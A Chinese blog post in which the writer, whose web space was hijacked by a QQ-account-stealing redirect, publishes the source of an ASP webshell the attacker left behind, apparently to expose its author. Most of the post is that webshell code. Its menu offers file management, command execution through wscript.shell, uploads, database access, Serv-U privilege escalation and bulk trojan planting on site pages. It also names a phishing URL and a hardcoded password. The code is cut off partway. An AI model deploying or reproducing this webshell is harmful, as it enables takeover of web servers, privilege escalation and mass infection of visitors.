揭露ASP木马作者的丑恶面目！


今天，我的空间又被植入了跳转木马，又是盗QQ号的那些。不过，在清除木马的过程中，居然让我找到了该杀的木马入侵者留下的控制ASP。查看一下源程序，哈，ASP木马作者的签名还在上面。
全部公布出来，让大家见识一下这些丑恶的家伙们。
跳转的QQ盗号网页：http://www.pkck.cn/web.htm
后缀名：.asa
源程序如下：
<%
Server.ScriptTimeout=999999999
Response.Buffer =true
On Error Resume Next '
UserPass="2201511"
mName="小康's Home"
SiteURL="http://www.55130.cn/"
Copyright="好好学习,天天向上"

sub ShowErr()
  If Err Then
    RRS"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
    Err.Clear:Response.Flush
  End If
end sub
Sub RRS(str)
        response.write(str)
End Sub
Function RePath(S)
  RePath=Replace(S,"\","\\")
End Function
Function RRePath(S)
  RRePath=Replace(S,"\\","\")
End Function
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
Action=Request("Action")
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
FolderPath=Request("FolderPath")
FName=Request("FName")

BackUrl="<br><br><center><a href='javascript:history.back()'>返回</a></center>"
RRS"<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312"">"
RRS"<title>"&mName&" - "&ServerIP&" </title>"
RRS"<style type=""text/css"">"
RRS"body,td{font-size: 12px;background-color:#444;color:#eee;}"
RRS"input,select,textarea{font-size: 12px;background-color:#ddd;border:1px solid #fff}"
RRS".C{background-color:#444;border:0px}"
RRS".cmd{background-color:#000;color:#FFF}"
RRS"body{margin: 0px;margin-left:4px;}"
RRS"a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}"
RRS".am{color:#888;font-size:11px;}"
RRS"</style>"
RRS"<script language=javascript>function killErrors(){return true;}window.onerror=killErrors;"
RRS"function yesok(){if (confirm(""确认要执行此操作吗？""))return true;else return false;}"
RRS"function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""→"&AD&"  --""+display;}runClock();"
RRS"function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}"
RRS"function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""请输入复制到目标文件全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""请输入移动到目标文件全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""请输入移动到目标文件夹全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""请输入移动到目标文件夹全名称"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""请输入要新建的文件夹全名称"",FName);top.hideform.FName.value = DName;}else if(FAction==""CreateMdb""){DName = prompt(""请输入要新建的Mdb文件全名称,注意不能同名！"",FName);top.hideform.FName.value = DName;}else if(FAction==""CompactMdb""){DName = prompt(""请输入要压缩的Mdb文件全名称,注意文件是否存在！"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}"
RRS"function DbCheck(){if(DbForm.DbStr.value == """"){alert(""请先连接数据库"");FullDbStr(0);return false;}return true;}"
RRS"function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = ""rovider=Microsoft.Jet.OLEDB.4.0;Data Source="&RePath(Session("FolderPath"))&"\\db.mdb;Jet OLEDBatabase Password=***"";Str[1] = ""Driver={Sql Server};Server="&ServerIP&",1433;Database=DbName;Uid=sawd=****"";Str[2] = ""Driver={MySql};Server="&ServerIP&"ort=3306;Database=DbName;Uid=rootwd=****"";Str[3] = ""Dsn=DsnName"";Str[4] = ""SELECT * FROM [TableName] WHERE ID<100"";Str[5] = ""INSERT INTO [TableName](USER,PASS) VALUES(\'username\',\'password\')"";Str[6] = ""DELETE FROM [TableName] WHERE ID=100"";Str[7] = ""UPDATE [TableName] SET USER=\'username\' WHERE ID=100"";Str[8] = ""CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"";Str[9] = ""DROP TABLE [TableName]"";Str[10]= ""ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"";Str[11]= ""ALTER TABLE [TableName] DROP COLUMN PASS"";Str[12]= ""当只显示一条数据时即可显示字段的全部字节，可用条件控制查询实现.\n超过一条数据只显示字段的前五十个字节。"";if(i<=3){DbForm.DbStr.value = Str;DbForm.SqlStr.value = """";abc.innerHTML=""<center>请确认己连接数据库再输入SQL操作命令语句。</center>"";}else if(i==12){alert(Str);}else{DbForm.SqlStr.value = Str;}return true;}"
RRS"function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert(""请检查数据库连接串是否正确!"");return false;}if(str.length<10){alert(""请检查SQL语句是否正确!"");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="""";DbForm.submit();return true;}"
RRS"</script>"
rrs "<body"
If Action="" then RRS " scroll=no"
rrs ">"
Dim ObT(13,2)
ObT(0,0) = "Scripting.FileSystemObject"
  ObT(0,2) = "文件操作组件"
ObT(1,0) = "wscript.shell"
  ObT(1,2) = "命令行执行组件"
ObT(2,0) = "ADOX.Catalog"
  ObT(2,2) = "ACCESS建库组件"
ObT(3,0) = "JRO.JetEngine"
  ObT(3,2) = "ACCESS压缩组件"
ObT(4,0) = "Scripting.Dictionary"
  ObT(4,2) = "数据流上传辅助组件"
ObT(5,0) = "Adodb.connection"
  ObT(5,2) = "数据库连接组件"
ObT(6,0) = "Adodb.Stream"
  ObT(6,2) = "数据流上传组件"
ObT(7,0) = "SoftArtisans.FileUp"
  ObT(7,2) = "SA-FileUp 文件上传组件"
ObT(8,0) = "LyfUpload.UploadFile"
  ObT(8,2) = "刘云峰文件上传组件"
ObT(9,0) = "ersits.Upload.1"
  ObT(9,2) = "ASPUpload 文件上传组件"
ObT(10,0) = "JMail.SmtpMail"
  ObT(10,2) = "JMail 邮件收发组件"
ObT(11,0) = "CDONTS.NewMail"
  ObT(11,2) = "虚拟SMTP发信组件"
ObT(12,0) = "SmtpMail.SmtpMail.1"
  ObT(12,2) = "SmtpMail发信组件"
ObT(13,0) = "Microsoft.XMLHTTP"
  ObT(13,2) = "数据传输组件"
For i=0 To 13
        Set T=Server.CreateObject(ObT(i,0))
        If -2147221005 <> Err Then
          IsObj=" √"
        Else
          IsObj=" ×"
          Err.Clear
        End If
        Set T=Nothing
        ObT(i,1)=IsObj
Next
If FolderPath<>"" then
  Session("FolderPath")=RRePath(FolderPath)
End If
If Session("FolderPath")="" Then
  FolderPath=RootPath
  Session("FolderPath")=FolderPath
End if
Function MainForm()
RRS"<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame"">"
RRS"<input type=""hidden"" name=""Action"">"
RRS"<input type=""hidden"" name=""FName"">"
RRS"</form>"
RRS"<table width='100%' height='100%'  border=0 cellpadding='0' cellspacing='0'>"
RRS"<tr><td height='30' colspan='2'>"
RRS"<table width='100%'>"
RRS"<form name='addrform' method='post' action='"&URL&"' target='_parent'>"
RRS"<tr><td width='60' align='center'>地址栏：</td><td>"
RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
RRS"</td><td width='140' align='center'><input name='Submit' type='submit' value='转到'> <input type='submit' value='刷新主窗口' onclick='FileFrame.location.reload()'>"
RRS"</td></tr></form></table></td></tr><tr><td width='170'>"
RRS"Do you Qihoo?rame name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></i-frame-X></td>"
RRS"<td>"
RRS"Do you Qihoo?rame name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></i-frame-X>"
RRS"</td></tr></table>"
End Function
Function MainMenu()
RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
RRS"<tr><td height='5'></td></tr>"
RRS"<tr><td><center><a href='"&SiteURL&"' target='_blank'><font color=red>"&mName&"</font></center></a><hr hight=1 width='100%'>"
RRS"</td></tr>"
If ObT(0,1)=" ×" Then
RRS"<tr><td height='24'>无权限</td></tr>"
Else
RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""><b> +>查看硬盘</b><div id=menu1 style=""width:100%;display='none'"" onmouseout=""menu1.style.display='none'"">"
Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>->站点<b>根目录</b></a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>->本程序目录</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Program Files"")'>→Program Files</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>->Documents</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")'>->pcAnywhere</a></td></tr>"
RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序<hr style='border:1px solid #222;' /></a></td></tr>"
RRS""
RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>->新建目录</a></td></tr>"
RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>->新建文本</a></td></tr>"
End If
RRS"<tr><td height='24' onmouseover=""menu2.style.display=''""><b>+>数据库操作</b><div id=menu2 style=""line-height:18px;width:100%;display='none'"" onmouseout=""menu2.style.display='none'"">"
RRS"   <a href='?Action=DbManager' target='FileFrame'>连接数据库</a><br>"
RRS"   <a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\New.mdb")&""",""CreateMdb"")'>建立MDB文件</a><br>"
RRS"   <a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\data.mdb")&""",""CompactMdb"")'>压缩MDB文件</a></div></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>->系统服务-用户账号</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=getTerminalInfo' target='FileFrame'><b>->终端端口-自动登录</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=ServerInfo' target='FileFrame'>->服务器信息-组件支持</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'><b>->执行CMD命令</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>->上传文件</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'><b>->Servu提权</b>(超强版)</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'><b>->查找文件-木马</b></a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>->批量<b>挂马</b>(超强版)</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>->批量<b>清马</b>(超强版)</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>->批量<b>替换</b>(超强版)</a></td></tr>"
RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>->批量挂马(普通版)</a></b></td></tr>"

这些人真垃圾